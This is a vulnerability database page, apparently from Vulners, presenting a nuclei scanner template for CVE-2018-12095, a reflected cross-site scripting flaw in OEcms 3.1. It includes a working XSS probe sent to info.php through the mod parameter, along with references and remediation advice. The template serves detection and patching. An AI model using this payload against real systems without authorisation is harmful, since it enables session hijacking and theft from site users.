Lucene search
K

OEcms 3.1 - Cross-Site Scripting

🗓️ 22 Jun 2026 05:20:07Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 22 Views

OEcms 3.1 - Reflected Cross-Site Scripting via mod parameter of info.php. Allows attacker to execute arbitrary JavaScript in victim's browser, leading to session hijacking, defacement, or theft of sensitive information. Apply latest patch or upgrade for fix

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
OEcms 3.1 - Cross-Site Scripting Vulnerability
16 Jun 201800:00
zdt
CNVD
OECMS Cross-Site Scripting Vulnerability
13 Jun 201800:00
cnvd
CVE
CVE-2018-12095
11 Jun 201811:00
cve
Cvelist
CVE-2018-12095
11 Jun 201811:00
cvelist
Exploit DB
OEcms 3.1 - Cross-Site Scripting
15 Jun 201800:00
exploitdb
exploitpack
OEcms 3.1 - Cross-Site Scripting
15 Jun 201800:00
exploitpack
NVD
CVE-2018-12095
11 Jun 201811:29
nvd
Packet Storm
OEcms 3.1 Cross Site Scripting
12 Jun 201800:00
packetstorm
Prion
Cross site scripting
11 Jun 201811:29
prion
id: CVE-2018-12095

info:
  name: OEcms 3.1 - Cross-Site Scripting
  author: LogicalHunter
  severity: medium
  description: OEcms 3.1 is vulnerable to reflected cross-site scripting via the mod parameter of info.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest patch or upgrade to a newer version of OEcms to fix the XSS vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/44895
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095
    - https://cxsecurity.com/issue/WLB-2018060092
    - https://nvd.nist.gov/vuln/detail/CVE-2018-12095
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2018-12095
    cwe-id: CWE-79
    epss-score: 0.05103
    epss-percentile: 0.91272
    cpe: cpe:2.3:a:oecms_project:oecms:3.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: oecms_project
    product: oecms
  tags: cve2018,cve,xss,edb,oecms_project,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402200adeb8306b9ea3d50c254bc742d60b3d72ddfc4961d0ff44b301b558efffe7eb022078c23194d1ba50a7d3eb2bde3c0d7a8b6d0f7649ebfeebe7f8e86fe97be2d150:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 23.5
CVSS 35.4
EPSS0.05103
22